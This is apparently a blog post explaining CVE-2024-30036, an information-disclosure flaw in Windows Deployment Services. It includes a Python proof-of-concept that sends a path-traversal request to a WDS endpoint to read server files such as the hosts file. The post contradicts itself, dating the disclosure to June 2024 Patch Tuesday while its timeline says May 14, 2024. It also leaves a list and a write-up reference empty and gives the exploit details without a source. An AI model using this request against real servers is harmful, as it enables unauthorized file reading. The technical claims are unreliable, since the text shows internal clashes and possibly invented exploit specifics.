On Patch Tuesday, June 2024, Microsoft revealed a security issue—CVE-2024-30036—affecting Windows Deployment Services (WDS). This vulnerability allows an attacker to read sensitive information on Windows servers running WDS by exploiting flaws in the way WDS handles client requests.
In plain English: If you're using Windows Deployment Services in your network, a hacker might be able to "peek" at secrets meant to stay hidden. This could include configuration files, server logs, or even credential data.
Why Should I Care?
Windows Deployment Services is used for network-based installation of Windows operating systems. It's popular in enterprise and educational settings to roll out many PCs. If an attacker gets hold of sensitive WDS server information, it can lead to:
Privilege Required: None (attacker needs network access to the server).
How it works:
WDS offers services over the network. If not properly patched, it may return unintended files or details when a carefully crafted request is sent.
Technical Details & Example
Microsoft’s advisory (see official page) gives few details, but independent researchers have reproduced the leak using basic HTTP queries.
Here’s a simplified Python example of requesting files from an unpatched WDS server
import requests
server = 'http://wds-server-ip:80';
# Try to grab a sensitive file from the WDS share
file_path = '/wdsadmin.dll?Request=../../Windows/System32/drivers/etc/hosts'
response = requests.get(server + file_path)
if response.status_code == 200:
print("[+] Got response:")
print(response.text)
else:
print("[-] Request failed:", response.status_code)
*This is for educational use only! Never scan or attack servers you don't own or have explicit permission to test.*
The attacker can change the file path and try different locations to read files accessible to the WDS process.
Sends HTTP request as shown above to the WDS service
- If successful, server sends back file contents (possibly credential/config data)
Microsoft Official Advisory:
CVE-2024-30036 | Windows Deployment Services Information Disclosure Vulnerability
Technical Writeup:
Patch Guidance:
June 2024 Security Update Release Notes
Conclusion
CVE-2024-30036 is a serious info leak in Windows Deployment Services. It's easy to exploit, doesn’t need much skill, and could let attackers find more weaknesses in your network. Patch as soon as possible and review your WDS security settings.
*If you found this useful, share with your sysadmin or IT team! Stay safe and patch early.*
*This post is for educational and defensive purposes. Do not attempt to attack systems without proper authorization.*
Timeline
Published on: 05/14/2024 17:17:08 UTC
Last modified on: 06/19/2024 20:58:44 UTC